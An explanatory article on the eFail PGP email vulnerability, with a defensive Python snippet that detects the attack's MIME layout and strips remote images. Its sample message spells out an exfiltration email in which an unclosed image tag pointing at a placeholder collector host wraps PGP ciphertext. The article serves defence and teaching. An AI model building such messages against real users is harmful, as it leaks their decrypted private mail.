PGP, which stands for Pretty Good Privacy, is a fairly popular method for encrypting emails. The OpenPGP standard has been in use since the early 1990s, when little was widely known or communicated about PGP encryption. And up until very recently, it was largely believed to be the safest way to transmit messages over the Internet without interference from a third party.
But researchers at Germany’s Münster University of Applied Sciences have discovered otherwise. They unearthed a vulnerability in PGP encryption that has since been labeled “eFail”: the active content in email correspondence is exploited through the native behavior of HTML, the markup language of all web pages. In email clients, this content may be downloaded automatically without the user’s knowledge or consent. Active content consists mostly of the styling and images in your emails.
How the exploit of PGP encryption works
For a PGP encryption attack to work, the attacker must be in possession of an encrypted message. This can be achieved in a number of ways, including eavesdropping and simple phishing attacks. Once access is gained, there are two attack vectors that can be used. The first is direct exfiltration, which takes advantage of vulnerabilities present in Thunderbird (Mozilla), iOS Mail and Apple Mail.
The attacker begins by crafting an HTML email that contains three functional parts: the beginning of an image request tag, the PGP ciphertext, and the closing of the image request tag. This is sent to the victim, whose email client will, perhaps unknowingly, decrypt the PGP ciphertext and then combine all three parts into a single URL prefixed with the attacker’s server address. The client ultimately sends a request for an image that doesn’t exist, but the request that arrives at the attacker’s server contains the decrypted email.
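As an added example that is not part of the original article, the following Python checks a raw MIME message for exactly this three-part layout (an HTML part that ends inside an open remote image tag, immediately followed by a PGP-armored part) and shows the mitigation side: removing remote image tags before anything is rendered. The addresses, hostname, boundary and ciphertext in the sample are constructed placeholders; nothing is decrypted.

```python
import email
import re
from email import policy

# Constructed demo message (not from the article): the <img src="..."> in the first
# HTML part is never closed; the second part carries placeholder PGP armor; the
# third part supplies the closing quote and bracket.
SAMPLE_EMAIL = """\
From: sender@example.invalid
To: victim@example.invalid
Subject: demo
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="demo-boundary"

--demo-boundary
Content-Type: text/html

<img src="http://collector.example.invalid/
--demo-boundary
Content-Type: text/plain

-----BEGIN PGP MESSAGE-----

PLACEHOLDERCIPHERTEXTNOTREALPLACEHOLDERCIPHERTEXT==
-----END PGP MESSAGE-----
--demo-boundary
Content-Type: text/html

">
--demo-boundary--
"""

# Matches an <img ... src="http://... whose src value is still open at the end of the part.
OPEN_IMG_RE = re.compile(r'<img[^>]*\bsrc\s*=\s*["\']https?://[^"\']*$', re.I)
PGP_ARMOR = "-----BEGIN PGP MESSAGE-----"

def flag_open_img_before_ciphertext(raw_message: str) -> bool:
    """True when a text/html part ends inside an unterminated remote <img src=...>
    and the very next leaf part carries PGP ciphertext. Pure structure check."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    leaves = [p for p in msg.walk() if not p.is_multipart()]
    for html_part, next_part in zip(leaves, leaves[1:]):
        if html_part.get_content_type() != "text/html":
            continue
        next_type = next_part.get_content_type()
        next_body = next_part.get_content() if next_type.startswith("text/") else ""
        if OPEN_IMG_RE.search(html_part.get_content().rstrip()) and (
                PGP_ARMOR in next_body or next_type == "application/pgp-encrypted"):
            return True
    return False

def strip_remote_images(html: str) -> str:
    """Mitigation: drop every <img> tag, including one left open at the end of a part,
    so the client never assembles or fetches an attacker-controlled image URL."""
    return re.sub(r'<img\b[^>]*(>|$)', "", html, flags=re.I)
```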
The second attack vector takes advantage of a flaw present in all email clients using PGP encryption or similar software following the OpenPGP specification. It is known as the CBC/CFB Gadget Attack. This scenario involves an attacker locating the first encrypted block of any given encrypted email. Once it is in their possession, another block consisting entirely of zeros is appended. This is followed by injecting HTML image tags into the plaintext, with the result that the victim’s email client interprets the whole as a single encrypted block. The plaintext, in turn, is sent back to the attacker in an image request.
How to avoid this vulnerability in PGP Encryption
If good news can be derived from the major vulnerability in PGP encryption, it is that there really isn’t a problem with the encryption protocol itself. The issue, instead, is how it is implemented. On top of this, an attacker cannot read your emails without first obtaining the encrypted correspondence. The best takeaway is that by disabling HTML rendering of your emails and using plain text instead, you should be safe from a PGP encryption attack regardless of which email client you choose to use.
The bad news? Boring, plain-text emails, and the fact that HTML messages sent and received in the past are still subject to PGP encryption attacks. Even if users opt to delete these old, archived messages, copies will inevitably exist elsewhere: in a different email client and in another user’s inbox.